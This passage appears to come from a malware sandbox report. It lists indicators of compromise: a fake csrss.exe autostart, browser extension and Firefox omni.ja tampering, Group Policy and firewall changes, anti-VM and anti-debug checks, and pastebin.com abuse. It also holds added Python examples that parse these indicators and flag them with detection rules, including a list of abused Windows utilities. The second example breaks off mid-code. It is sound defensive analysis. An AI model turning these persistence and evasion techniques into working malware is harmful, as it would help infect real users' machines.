| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Manipulates WinMonFS driver.
| Description | Indicator | Process | Target |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
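The tables above list indicators one row at a time, and the same few artifacts recur across sections: the `csrss` value under Run, `C:\Windows\rss\csrss.exe`, the Startup `.bat` files written by regasm.exe, the Chromium extension IDs, the `\??\WinMonFS` device object, pastebin.com. The Python below is an added example, not part of the sandbox report: it parses rows in the report's own `| Description | Indicator | Process | Target |` layout into a hunt list and labels each Run/RunOnce entry. The sample rows are copied from the tables above. The labelling rules are this example's heuristics: a system-binary name such as csrss.exe launched from outside System32/SysWOW64 is treated as masquerading, a `wextract_cleanupN` RunOnce value is recognised as the Windows self-extractor's own cleanup entry, and extension IDs are matched as 32 letters in the range a-p (the Chromium ID alphabet).

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Sample input for this example: rows copied verbatim from the signature tables
# above, in the report's own "| Description | Indicator | Process | Target |" layout.
SAMPLE_ROWS = r'''
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| File opened for modification | \??\WinMonFS | C:\Windows\rss\csrss.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe | N/A |
| N/A | pastebin.com | N/A | N/A |
'''

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\[^\\]+$", re.IGNORECASE)
EXT_ID_RE = re.compile(r"\\Extensions\\([a-p]{32})\\")   # Chromium extension IDs: 32 letters a-p
DRIVE_RE = re.compile(r"\\\?\?\\[A-Za-z]:")              # \??\D: style drive probes, not devices
DOMAIN_RE = re.compile(r"[a-z0-9-]+(\.[a-z0-9-]+)+", re.IGNORECASE)
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
SYSTEM_BINARIES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "explorer.exe"}

@dataclass
class Autostart:
    key: str
    value_name: str
    command: str
    writer: str        # process that set the value

@dataclass
class Iocs:
    autostarts: list[Autostart] = field(default_factory=list)
    firewall_rules: list[tuple[str, str, str]] = field(default_factory=list)
    dropped_files: set[str] = field(default_factory=set)
    browser_extensions: set[str] = field(default_factory=set)
    device_objects: set[str] = field(default_factory=set)
    domains: set[str] = field(default_factory=set)

def _unquote(s: str) -> str:
    return s[1:-1] if len(s) >= 2 and s[0] == s[-1] == '"' else s

def unescape_reg_value(raw: str) -> str:
    """Undo the report's escaping of registry data (backslash-escaped quotes and backslashes)."""
    return _unquote(re.sub(r"\\(.)", r"\1", _unquote(raw.strip())))

def parse_report_rows(text: str) -> Iocs:
    """Extract host IOCs from report table rows; header and malformed rows are skipped."""
    iocs = Iocs()
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        desc, indicator, writer, _target = cells
        if desc.startswith("Set value") and " = " in indicator:
            path, raw = indicator.split(" = ", 1)
            value = unescape_reg_value(raw)
            if "\\FirewallPolicy\\FirewallRules\\" in path:
                iocs.firewall_rules.append((path, value, writer))
            elif RUN_KEY_RE.search(path):
                key, name = path.rsplit("\\", 1)
                iocs.autostarts.append(Autostart(key, name, value, writer))
        elif desc == "File created":
            iocs.dropped_files.add(indicator)
            if m := EXT_ID_RE.search(indicator):
                iocs.browser_extensions.add(m.group(1))
        elif indicator.startswith("\\??\\") and not DRIVE_RE.fullmatch(indicator):
            iocs.device_objects.add(indicator)   # named device object, e.g. a driver's control interface
        elif desc == "N/A" and DOMAIN_RE.fullmatch(indicator):
            iocs.domains.add(indicator.lower())
    return iocs

def first_executable(command: str) -> str:
    """Program part of a command line: the leading quoted span, else the first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]

def classify_autostart(entry: Autostart) -> str:
    """Heuristic label for one Run/RunOnce value (this example's own rules)."""
    if re.fullmatch(r"wextract_cleanup\d+", entry.value_name, re.IGNORECASE):
        # Written by Windows' wextract self-extractor so the IXP000.TMP directory is
        # deleted at next logon: benign by itself, but it names the extraction directory.
        return "wextract-cleanup"
    exe = first_executable(entry.command)
    if "\\" not in exe:
        return "unresolved-path"   # bare image name resolved via PATH; judge from process telemetry
    directory, _, name = exe.rpartition("\\")
    if name.lower() in SYSTEM_BINARIES and directory.lower() not in SYSTEM_DIRS:
        return "masquerading-system-name"
    return "review"

def classify_autostarts(iocs: Iocs) -> dict[str, str]:
    return {a.value_name: classify_autostart(a) for a in iocs.autostarts}
```

Run `parse_report_rows` over a saved copy of the whole report rather than only these rows; the header row and anything with other than four cells is skipped. Registry data in the report is escaped (`\"C:\\Windows\\rss\\csrss.exe\"`), which is why `unescape_reg_value` runs before any path comparison: matching on the escaped form would miss `C:\Windows\rss\csrss.exe`. Drive probes such as `\??\D:` are deliberately excluded from `device_objects`, so that list is left with genuinely named devices like `\??\WinMonFS`.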
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4960 set thread context of 4284 | N/A | C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\GaDkQze.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ARTXeDTAxvUn\ILNjVYD.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\qaeykIa.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
| File created | C:\Program Files (x86)\RVqmAwyyxwiU2\BoPjNTTVXpgKP.dll | C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Tasks\QhciBzJOokLnyYZub.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Tasks\qbSDwEgyNYPZlGA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
| File created | C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\Installer\e5991a7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e5991a7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Tasks\bWycNackLSywaqkmgR.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe | N/A |
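The behaviours recorded above are relationships between a process and what it touches: a dropper running from the Pictures folder writes `C:\Windows\System32\GroupPolicy\Machine\Registry.pol` and a FirewallRules registry value, SPYXfri.exe from `C:\Windows\Temp` rewrites Firefox's `omni.ja`, regasm.exe writes `.bat` files into the Startup folder, `C:\Windows\rss\csrss.exe` opens the `\??\WinMonFS` device, and the sample sets the thread context of a regasm.exe process (PID 4960 on PID 4284). Those relationships survive a repack when file hashes do not. The Python below is an added example, not part of the sandbox report: a small rule set over EDR/Sysmon-style events. The event schema (`event`, `image`, `target`, `pid`, `target_pid`), the event names, and the directory lists are this example's assumptions; the sample events are constructed from the rows above and include two deliberately benign ones (a drive-letter probe and PowerShell writing its own profile cache).

```python
import re
from collections import defaultdict

# Directories an unknown executable should not normally run from (heuristic).
UNTRUSTED_IMAGE_DIRS = re.compile(r"^c:\\(users|windows\\temp|programdata)\\", re.IGNORECASE)
SYSTEM_IMAGE_DIRS = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.IGNORECASE)
DRIVE_LETTER = re.compile(r"^\\\?\?\\[a-z]:$", re.IGNORECASE)   # \??\D: is drive enumeration, noisy
# Locations whose modification by an untrusted image is almost never legitimate.
PROTECTED_PREFIXES = (
    "c:\\windows\\system32\\grouppolicy\\",           # local GPO: Registry.pol, gpt.ini
    "c:\\program files\\mozilla firefox\\browser\\",  # omni.ja, browser\features\*.xpi
)
# .NET and Windows utilities that have no business writing user autostart files.
STARTUP_LOLBINS = {"regasm.exe", "regsvcs.exe", "installutil.exe", "rundll32.exe", "msiexec.exe", "mshta.exe"}

# Constructed events modelled on rows from the report above (not real telemetry).
SAMPLE_EVENTS = [
    {"event": "FileCreate", "image": r"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe",
     "target": r"C:\Windows\System32\GroupPolicy\Machine\Registry.pol"},
    {"event": "FileModify", "image": r"C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe",
     "target": r"C:\Program Files\Mozilla Firefox\browser\omni.ja"},
    {"event": "FileCreate", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe",
     "target": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat"},
    {"event": "FileOpen", "image": r"C:\Windows\rss\csrss.exe", "target": r"\??\WinMonFS"},
    {"event": "FileOpen", "image": r"C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe", "target": r"\??\D:"},
    {"event": "SetThreadContext", "pid": 4960, "target_pid": 4284,
     "image": r"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe",
     "target": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"},
    {"event": "RegistryValueSet", "image": r"C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe",
     "target": "\\REGISTRY\\MACHINE\\SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\FirewallRules\\C:\\"},
    {"event": "FileCreate", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive"},
]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, image, target) findings; one event may satisfy several rules."""
    findings = []
    for e in events:
        kind, image, target = e["event"], e["image"], e.get("target", "")
        t = target.lower()
        if kind in ("FileCreate", "FileModify") and t.startswith(PROTECTED_PREFIXES) \
                and UNTRUSTED_IMAGE_DIRS.match(image):
            findings.append(("protected_location_write", image, target))
        if kind == "FileCreate" and "\\start menu\\programs\\startup\\" in t \
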